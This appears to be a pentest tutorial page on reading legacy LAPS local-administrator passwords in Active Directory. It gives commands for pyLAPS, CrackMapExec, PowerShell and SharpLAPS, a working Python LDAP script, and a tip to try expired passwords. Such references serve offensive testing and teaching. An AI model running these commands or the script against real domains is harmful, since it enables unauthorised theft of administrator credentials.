ReadLAPSPassword
This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or a combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wide synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator), which legacy LAPS stores in cleartext in the confidential ms-Mcs-AdmPwd attribute, next to its expiration date in ms-Mcs-AdmPwdExpirationTime. Because ms-Mcs-AdmPwd is a confidential attribute, a principal lacking the right simply gets no value back rather than an access error: an empty password in the output means missing rights, not an unmanaged computer. The expiration attribute is not confidential, so it still reveals which computers are LAPS-managed.
UNIX-like
pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101
Alternatively, CrackMapExec also has this ability (since v5.1.6). In case it doesn't work, this public module for CrackMapExec could also be used.
# Default command
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps option.
Windows
This can be achieved with the Active Directory PowerShell module (Get-ADComputer), with PowerView (Get-DomainComputer), or with SharpLAPS.
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
Get-DomainComputer "MachineName" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"
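The tools above hide what the LDAP query actually looks like. The following script is an added example (not code from The Hacker Recipes, pyLAPS, CrackMapExec or any other tool named on this page) that performs the same read with the ldap3 library: it builds the filter for LAPS-managed computers (with an optional name wildcard, escaped so that an attacker-supplied pattern cannot break the filter), converts ms-Mcs-AdmPwdExpirationTime from a Windows FILETIME to a UTC date, and flags the two things a practitioner checks before using a password: whether the attribute was actually returned (no value means the bind account lacks the right) and whether the password has expired. The domain, user and host values, the SAMPLE_ENTRIES used offline, and the dump_laps helper name are all assumptions made for the example.

```python
#!/usr/bin/env python3
"""Read legacy LAPS passwords (ms-Mcs-AdmPwd) over LDAP.

Added example, not part of The Hacker Recipes or of the tools it lists.
The pure-Python helpers run offline; dump_laps() needs the ldap3 package
and a reachable domain controller.
"""
from datetime import datetime, timedelta, timezone

LAPS_ATTRS = ["sAMAccountName", "ms-Mcs-AdmPwd", "ms-Mcs-AdmPwdExpirationTime"]


def escape_filter_value(value: str, keep_wildcard: bool = True) -> str:
    """RFC 4515 filter escaping. '*' is kept so callers can pass patterns
    such as "WIN-*"; parentheses, backslash and NUL are always escaped."""
    out = []
    for ch in value:
        if ch == "*" and keep_wildcard:
            out.append(ch)
        elif ch in "*()\\\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def build_laps_filter(computer: str = "*") -> str:
    """Computers that have a LAPS expiration time set (i.e. are LAPS-managed).
    Computer accounts have a trailing '$' in sAMAccountName."""
    return ("(&(objectCategory=computer)(ms-Mcs-AdmPwdExpirationTime=*)"
            "(sAMAccountName=%s$))" % escape_filter_value(computer))


def filetime_to_datetime(filetime: int) -> datetime:
    """ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def _first(value):
    """ldap3 returns single-valued attributes as str/int, or [] when absent."""
    if isinstance(value, list):
        return value[0] if value else None
    return value


def summarize(entries, now=None):
    """Turn LDAP entries into records; password None means the attribute was
    not returned, which for a confidential attribute means missing rights."""
    now = now or datetime.now(timezone.utc)
    results = []
    for entry in entries:
        attrs = entry["attributes"]
        expiry_raw = _first(attrs.get("ms-Mcs-AdmPwdExpirationTime"))
        expires = filetime_to_datetime(int(expiry_raw)) if expiry_raw else None
        results.append({
            "computer": _first(attrs.get("sAMAccountName")),
            "password": _first(attrs.get("ms-Mcs-AdmPwd")),
            "expires": expires,
            "expired": bool(expires and expires < now),
        })
    return results


def dump_laps(dc_ip, domain, user, password, computer="*"):
    """Live query (assumed helper name). NTLM bind, then search the domain root."""
    from ldap3 import Connection, Server, NTLM, SUBTREE  # imported here so the helpers work without ldap3
    base_dn = ",".join("DC=%s" % part for part in domain.split("."))
    conn = Connection(Server(dc_ip), user="%s\\%s" % (domain, user), password=password,
                      authentication=NTLM, auto_bind=True)
    conn.search(base_dn, build_laps_filter(computer), search_scope=SUBTREE, attributes=LAPS_ATTRS)
    entries = [r for r in conn.response if r.get("type") == "searchResEntry"]
    return summarize(entries)


# Constructed sample entries (not captured from a real domain) so the parsing
# can be exercised offline: one expired password, one unreadable, one valid.
_JAN_2024 = 133485408000000000  # FILETIME for 2024-01-01 00:00:00 UTC
SAMPLE_ENTRIES = [
    {"attributes": {"sAMAccountName": "WIN-S10$", "ms-Mcs-AdmPwd": "Xk2#q9!pL7v",
                    "ms-Mcs-AdmPwdExpirationTime": _JAN_2024}},
    {"attributes": {"sAMAccountName": "WIN-S11$", "ms-Mcs-AdmPwd": [],
                    "ms-Mcs-AdmPwdExpirationTime": _JAN_2024 + 30 * 86400 * 10**7}},
    {"attributes": {"sAMAccountName": "WIN-S12$", "ms-Mcs-AdmPwd": "r4$Tz8Wq1!m",
                    "ms-Mcs-AdmPwdExpirationTime": _JAN_2024 + 30 * 86400 * 10**7}},
]

if __name__ == "__main__":
    for rec in summarize(SAMPLE_ENTRIES, now=filetime_to_datetime(_JAN_2024 + 10**7)):
        status = "NO RIGHTS" if rec["password"] is None else ("EXPIRED" if rec["expired"] else "ok")
        print(rec["computer"], rec["password"], rec["expires"], status)
```

Run it without arguments to see the offline sample; call dump_laps('192.168.56.101', 'DOMAIN', 'USER', 'PASSWORD', 'WIN-*') for a live read. An expired entry is not necessarily useless: the LAPS client only rotates the password when its group policy refresh runs, so a stale expiration time on a powered-off or disconnected machine is worth trying anyway.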